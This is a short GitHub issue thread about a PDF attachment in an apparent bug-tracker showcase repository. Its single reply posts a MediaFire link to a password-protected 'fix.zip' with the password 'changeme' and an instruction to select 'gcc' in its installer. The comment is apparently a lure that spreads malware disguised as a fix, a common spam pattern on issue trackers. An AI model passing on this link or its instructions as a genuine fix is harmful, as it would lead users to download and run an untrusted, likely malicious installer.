### ISSUE TITLE
Issue with PDF

### ISSUE THREAD

**Issue by dev-significo** [SignificoHealth/bug-tracker-showcase-android#11]
## Associated documents:

- [1724680484005-lorem-ipsum.pdf](https://github.com/SignificoHealth/bug-tracker-showcase-android/blob/main/attachments/1724680484005-lorem-ipsum.pdf)

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
